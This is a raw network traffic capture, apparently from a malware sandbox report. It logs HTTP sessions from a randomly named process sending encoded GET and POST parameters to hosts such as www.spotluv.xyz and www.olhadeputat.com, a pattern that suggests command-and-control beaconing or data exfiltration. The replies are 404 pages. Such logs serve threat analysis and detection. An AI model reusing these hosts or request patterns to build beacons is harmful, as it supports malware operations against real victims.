                                                            Data Ascii: vX=TQpyyhykb0+15aJINlpRsdmZKDX0NF4mEPVByAY42EL/wikcxre3HNsQ8Da8fjZWn+WSpxlktDuyzDJTd9d/2xRyCjhIpSue+aSdcY4Nc2U21KcfsyWTp7nGodgqJf+Me9htjEziJKzC9h+sESraM8nPWJzaz5qcYl1Xm8GERGhNYVKgcKyIVvDObyqPiQELI5/CC7vx9xj2rfIusn0E1WGrQsPp7BOe+EhU2W8B1s8P3z+Xn2wJnn9J5zmDRIGKh2PKc0IJhMgxUTxJ5kO3wk8fjJs9h7aUP3pSYy8gtNn43HvuVuWcjVXvW6F0G4Fh+gxxV+P+uUUA7D0Fz0QSzP6k/YyjeYA9vPKZgY8TVv5mYV+eNUrKWqpjPG5NeO1fb1SZX0rypnPGAUwRZuHjuscXpTqCBZKgHHfByyXfCGYDH3Cdn6yhYBo+nN4pEJCqklyhxl/CcauCvp7DS0NmYbT+2CBZ295eTBmbNsi/bd70oDMeqhyd6Tl9AAibxU13MPKgPxQpoqz+1v5Ck6CyV1ophPgZmPQxWyf/o3vpaMO4dMFUOQb5McwrMWKKHCzXimiedIZqJJqEnoAkfDFw10cHQPI95kRalAj76J/cd0hY4LXK7fN3x8A2JvMkFdDFSSu/yQh/Qvs3KAMh+PCAfIdEFTW8MQMIGjb67sVwNOfKJd+ZMCFs58UWIc5OjdxJJ1cgweAyebToyzq8VhDQOR0Ikf8MRIRH75/gyVgbjQHrW9beOFBE3ciQ86FaazKV5f6zL1magPiXGvVBpuInoyPgg0qVUCztKh0XnT4iVoSY3NMiTQGHht4Q76rd53fg/oCW2gYLUXfTQqTQOCqK9QYVVHiM0EnD33smPlfQhvIawydlMF/nWzArBv41fwrjFzaKXJvA9UFydcqFJAirC4DD9eTc3fzI0n80qtMrni+m4PjDsR9DJRc6kT0vehdzS82dvRvk2xH5CMWQlXtjgHDZf6JK5Qmq0pNUB2CitwPjL4pOk [TRUNCATED]
                                                            Jul 3, 2024 17:38:19.538407087 CEST5156OUTData Raw: 5a 5a 2b 6b 2b 49 77 5a 74 4b 58 63 38 34 52 59 73 44 45 35 74 55 6c 64 6a 70 34 68 61 79 65 4b 67 7a 38 45 58 36 54 49 67 49 68 59 48 50 74 6a 4b 6a 31 62 75 58 6b 74 6b 4d 6b 76 75 41 79 62 63 6b 41 73 72 2b 7a 6d 74 51 6d 39 39 50 71 39 42 45
                                                            Data Ascii: ZZ+k+IwZtKXc84RYsDE5tUldjp4hayeKgz8EX6TIgIhYHPtjKj1buXktkMkvuAybckAsr+zmtQm99Pq9BENLsFQoda0209g0deMXvPHvr3v3Z1qbyayrGdka5mAJtfjA1n9/ezuDQvlbd1IT1xKTvxLpzNif+78vCUMA29EuMLjIKU9vRYTBuD/wkLK+oplMJS+cYmjYhAwY8e5Lz68AzQrIzVtnhfBSJAqhKrYMR+3YTxJj6+7
                                                            Jul 3, 2024 17:38:19.538464069 CEST3867OUTData Raw: 64 57 41 30 4e 59 70 7a 4d 31 75 65 4c 53 58 67 30 4b 74 74 4d 7a 77 43 4e 6f 57 39 41 4b 2b 54 42 6d 74 2f 43 4a 50 32 57 6d 4e 50 47 30 33 62 71 34 39 37 51 53 70 42 6c 4c 57 55 53 30 51 74 75 6f 32 31 73 77 36 64 4d 75 71 68 52 69 31 2f 54 39
                                                            Data Ascii: dWA0NYpzM1ueLSXg0KttMzwCNoW9AK+TBmt/CJP2WmNPG03bq497QSpBlLWUS0Qtuo21sw6dMuqhRi1/T9Gn3mN2UX/6ywb9x6iiyo7AlASPyT3itzPg2FeXEXTrhd9YqcEJ2MMMW5yZCtlBmi9Z+ArEadPjAb+teFSFmtD2+I4urnNEKVkIdBUq/huzkwyyNmDkk9nvjLDsc5qMACrvLnvECk0L+Cai9AyTWP58TdhVPLIVI7k
                                                            Jul 3, 2024 17:38:19.713001013 CEST1289OUTData Raw: 52 49 4f 70 77 77 7a 6a 44 78 45 6a 74 5a 42 59 4b 58 79 76 6b 77 48 70 56 70 70 6b 38 76 54 70 53 6e 2f 4f 58 6a 6e 34 77 31 65 6f 6f 75 4f 4b 4d 4b 61 78 2b 71 67 69 62 2f 7a 71 64 30 30 68 5a 74 72 72 43 2b 42 45 38 69 51 63 6f 69 72 31 37 6e
                                                            Data Ascii: RIOpwwzjDxEjtZBYKXyvkwHpVppk8vTpSn/OXjn4w1eoouOKMKax+qgib/zqd00hZtrrC+BE8iQcoir17nvdpVYgTmZ5EzZIhNxqKwmUdlQSBajzX81QbUpkGc4vKZUnsiP5gP6VygfGsPv60B9xDu5u0IBb2ezVXxgiWzI1bsEx1sCNlzq2C8zzayH4TFh3VLbqL0R6JU/2IJ2vDpCzmpNmCFJujVS6k859kie0oB+W50gmYke
                                                            Jul 3, 2024 17:38:19.713049889 CEST2578OUTData Raw: 4e 37 67 54 37 7a 30 4a 41 2b 63 78 6f 53 62 53 43 2f 6d 78 6d 39 46 38 34 4c 6e 70 4e 48 53 44 69 6b 59 68 57 6c 6c 6a 78 59 50 66 46 65 54 78 48 31 46 62 4b 7a 48 70 52 58 33 30 6b 39 51 42 38 4c 49 30 42 41 53 56 59 71 6d 32 66 58 31 71 7a 6f
                                                            Data Ascii: N7gT7z0JA+cxoSbSC/mxm9F84LnpNHSDikYhWlljxYPfFeTxH1FbKzHpRX30k9QB8LI0BASVYqm2fX1qzo0jsE5f7qcJcpMX1ZbnAbH/i8rHXrRwTkDTTRSTCwVUBVDNuueXZQCGWuUvbfqoJELI0YMaxVrDTLsly/olB3mtuxaeLph31PNPH2ioqZ4wtOvpaDgG+gINbAaC6purGtFRao/D7Gw1vZs762ajsMQdgt1GAkuX18U
                                                            Jul 3, 2024 17:38:19.713098049 CEST1289OUTData Raw: 39 79 45 6a 6c 63 43 4d 54 51 66 74 44 48 63 6b 76 43 70 75 4c 53 46 78 4a 59 4a 62 56 52 42 32 45 57 64 4a 58 7a 53 34 4f 6d 72 30 67 51 35 71 71 67 70 49 67 78 52 4b 4b 39 2b 67 51 41 30 30 61 46 63 58 6b 2f 47 2b 70 61 44 38 52 41 64 4e 44 4f
                                                            Data Ascii: 9yEjlcCMTQftDHckvCpuLSFxJYJbVRB2EWdJXzS4Omr0gQ5qqgpIgxRKK9+gQA00aFcXk/G+paD8RAdNDOLCvPSsxBP+I29tvQ2toyXvPB0ypN0Oo4n2beYBenYSLJJwOT5h2+WHYad5lTuTYKJNSvY3pEh8hxUFrOl+51RB/eiwoQ9RKUNR+1EXIAW0Uk/Zkf1hPIU+s6wYwi33CRTY1HqnZy5bbQv9bbxAwsHUrLhjcSmsMbN
                                                            Jul 3, 2024 17:38:19.713526011 CEST9023OUTData Raw: 44 62 6a 56 6c 55 34 52 38 45 76 66 72 74 30 73 72 50 2f 4a 65 6b 33 69 67 79 64 51 6c 4e 34 50 7a 35 4d 32 4d 32 34 50 6e 6c 52 6a 75 4e 4d 56 4d 7a 37 76 46 57 68 65 39 43 6d 52 5a 49 69 6b 58 32 53 6e 69 42 49 2f 79 7a 35 32 48 56 4d 51 61 54
                                                            Data Ascii: DbjVlU4R8Evfrt0srP/Jek3igydQlN4Pz5M2M24PnlRjuNMVMz7vFWhe9CmRZIikX2SniBI/yz52HVMQaThsCIe9SD1/mO2Bc+0XWn/weZ6z+IJrGUsmElbcmxOQTc1XVEvVXtj36eCDOLm9oP/dLPmKFEmADWLO2Z3SzHvJFEglhg9xah6tt7QjnSoSwwAxRnLOe32DoU72UsGYhtvaJxF1b/p/LLhQbfKOXpD3Ud5THZdBxXT
                                                            Jul 3, 2024 17:38:19.713577032 CEST5156OUTData Raw: 6b 56 4d 6d 65 34 2f 77 65 63 35 4b 44 46 77 45 4a 36 57 6b 72 6f 6b 2f 7a 61 71 62 79 35 59 76 77 69 48 45 61 70 34 73 4b 67 32 6d 79 55 57 35 64 36 35 46 6b 59 48 75 76 42 49 77 75 4b 58 70 45 30 57 77 4a 47 59 4a 54 6e 38 4a 61 43 6a 4e 47 6f
                                                            Data Ascii: kVMme4/wec5KDFwEJ6Wkrok/zaqby5YvwiHEap4sKg2myUW5d65FkYHuvBIwuKXpE0WwJGYJTn8JaCjNGoefVsODzyAXKlSq0xcdhJIoUnPKQhr6UMBh+WMxWW/ykW7tMzmOdpjtSUMwxiXDrQ4FtzzoG93lffoa9vK2Bk4MDtfBkJikVFHzdbu94EDpyuKhyWGVG6bjj2OF3dObaOxcnfK5DbS8AysyKcMmI+xCTS6/N2ZA7UO
                                                            Jul 3, 2024 17:38:19.713633060 CEST2578OUTData Raw: 6a 6d 2f 32 75 58 45 70 42 35 42 43 6d 42 76 75 64 31 4e 4b 68 73 34 58 4c 51 5a 4d 56 46 41 2f 68 46 46 31 70 78 47 47 53 6b 6e 73 76 41 50 34 4b 39 78 68 62 72 33 6a 49 63 6d 36 6f 30 4a 71 31 77 37 35 46 75 38 67 6d 78 62 67 5a 5a 4a 44 30 47
                                                            Data Ascii: jm/2uXEpB5BCmBvud1NKhs4XLQZMVFA/hFF1pxGGSknsvAP4K9xhbr3jIcm6o0Jq1w75Fu8gmxbgZZJD0GVxHosh13fy4S/2mJQ7a31QdZ9upUdiou7PBF4gXe5zq95BM+WtidbwokEGHhi0sw6FtLnkXCXS+bc7CvG1mKd4pZo/OWE3Y7VEajuFGeO54FMhNetQ25ySD0IQhwSxIiR15EPdk7HhJga0O+jTwACtMfT3YDmg05W
                                                            Jul 3, 2024 17:38:19.713802099 CEST3867OUTData Raw: 51 74 33 5a 6c 59 38 50 47 50 4d 69 43 50 38 41 33 44 47 37 30 4d 34 74 4f 66 2f 59 37 63 66 4e 2f 67 6a 6a 6e 43 39 79 31 72 55 56 6f 74 7a 42 36 70 36 6e 64 54 68 48 44 44 58 6f 4d 74 45 77 56 66 76 6e 46 53 45 52 4c 4b 38 68 4f 58 4f 58 35 54
                                                            Data Ascii: Qt3ZlY8PGPMiCP8A3DG70M4tOf/Y7cfN/gjjnC9y1rUVotzB6p6ndThHDDXoMtEwVfvnFSERLK8hOXOX5TOtK8ZR4URE+nWkHISic7RFyarUpVilQtRNNka9sLxDEmv0H6fTl4aWB395Ps19hbnmuIG3Ez/L5qtdftg9vUMiyWcvSz6NMa2jS6fYwdTSKtHIB6oZfX0VfYM11e6+RPaecIZOdDyDjTrZQPhdmLofvVAYkKMZNr4
                                                            Jul 3, 2024 17:38:19.892807007 CEST1289OUTData Raw: 46 69 51 4d 5a 56 58 49 57 6d 54 4e 6f 5a 73 50 6c 4a 37 4a 73 61 6b 31 4c 50 79 48 57 6a 7a 4b 37 38 2b 75 6c 49 36 45 52 42 72 69 30 6f 35 58 73 4f 73 41 36 55 32 6c 46 65 61 47 6c 5a 6d 57 34 64 46 41 75 56 34 67 59 4a 55 49 30 57 51 30 47 6d
                                                            Data Ascii: FiQMZVXIWmTNoZsPlJ7Jsak1LPyHWjzK78+ulI6ERBri0o5XsOsA6U2lFeaGlZmW4dFAuV4gYJUI0WQ0GmQBcCgznhkR06KtNnwZcICEPOkW69OKPB5WBkOFC/TQJvJU1LnzAzui0VAATB31AUwHAYCUD4aPU3NvHLcpR3xz74W+MDOphG9HejuT2mYWwq784az/0HkZfj7+EmHNKC1VcxqJZkipHfa+P8yD5HGVZn28W5YBYJ+
                                                            Jul 3, 2024 17:38:20.098349094 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:19 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.11.2049802203.161.50.127807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:22.262573957 CEST519OUTGET /pci0/?_B7=LxyxWrj8kri0gh&vX=eSBSxWzRVUHV/fBDA1gktKapDAjXHwIYGqgWiDMm1TKOgAQN0YKNcvcCpBWCJxpF3POgg0Ef/1qs6yZQX/5+pidIDj1j3gicnpT8MY0pZ20V89EBh37W5PY= HTTP/1.1
                                                            Host: www.spotluv.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:22.447380066 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:22 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Jul 3, 2024 17:38:22.447443962 CEST1289INData Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20
                                                            Data Ascii: "translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1
                                                            Jul 3, 2024 17:38:22.447549105 CEST1289INData Raw: 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32
                                                            Data Ascii: 99 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.00
                                                            Jul 3, 2024 17:38:22.447562933 CEST1289INData Raw: 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22
                                                            Data Ascii: roke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -
                                                            Jul 3, 2024 17:38:22.447741032 CEST1289INData Raw: 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e
                                                            Data Ascii: ay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14
                                                            Jul 3, 2024 17:38:22.447756052 CEST1289INData Raw: 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37
                                                            Data Ascii: 23.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.5322
                                                            Jul 3, 2024 17:38:22.447869062 CEST1289INData Raw: 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69
                                                            Data Ascii: 412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
                                                            Jul 3, 2024 17:38:22.447884083 CEST1289INData Raw: 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39
                                                            Data Ascii: 6" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.
                                                            Jul 3, 2024 17:38:22.448076010 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66
                                                            Data Ascii: id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse
                                                            Jul 3, 2024 17:38:22.448122025 CEST1289INData Raw: 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a
                                                            Data Ascii: 0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170
                                                            Jul 3, 2024 17:38:22.621212959 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a
                                                            Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.3694


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.11.2049803172.67.146.224807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:27.957123995 CEST791OUTPOST /ieqg/ HTTP/1.1
                                                            Host: www.olhadeputat.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.olhadeputat.com
                                                            Referer: http://www.olhadeputat.com/ieqg/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 38 4d 77 54 4d 43 41 45 41 57 6d 68 7a 5a 78 34 6a 2b 4e 4e 66 34 61 36 44 46 44 61 43 69 34 37 68 77 76 38 43 67 70 48 4a 70 4d 75 6a 42 66 65 4a 73 6b 56 74 78 6a 67 4d 4a 4c 6a 33 2f 62 69 48 59 33 50 4d 63 30 68 54 43 43 4e 50 6f 4d 70 50 54 31 32 6d 2f 66 51 6e 38 35 57 75 57 4c 57 37 47 7a 66 4a 79 44 44 49 59 48 54 52 54 4b 51 55 7a 79 46 4e 47 57 59 50 38 45 58 70 75 78 49 59 53 64 70 54 73 6b 64 48 34 75 35 74 62 77 48 48 6b 70 44 34 7a 79 66 32 51 63 6f 49 44 53 6e 31 4d 50 57 6e 56 5a 49 37 55 66 6d 38 59 61 37 52 65 54 41 57 71 63 30 47 73 37 57 42 6e 4f 6c 76 51 3d 3d
                                                            Data Ascii: vX=8MwTMCAEAWmhzZx4j+NNf4a6DFDaCi47hwv8CgpHJpMujBfeJskVtxjgMJLj3/biHY3PMc0hTCCNPoMpPT12m/fQn85WuWLW7GzfJyDDIYHTRTKQUzyFNGWYP8EXpuxIYSdpTskdH4u5tbwHHkpD4zyf2QcoIDSn1MPWnVZI7Ufm8Ya7ReTAWqc0Gs7WBnOlvQ==
                                                            Jul 3, 2024 17:38:28.196312904 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:28 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Powered-By: ASP.NET
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1KfYUODC9rRl6oCVbOiEn1Atas4taJDBfsZofnl3UtmUkX%2BOwItBL%2BE76nNUUAhQbRYxewhwV%2BXKcUw%2BV6Ki85DEBAA1TnKZArLh4pmhQWZXkTcAO2WRvSWipnUgql6V4kb%2Btvi"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f6751bd389ec-ORD
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c [TRUNCATED]
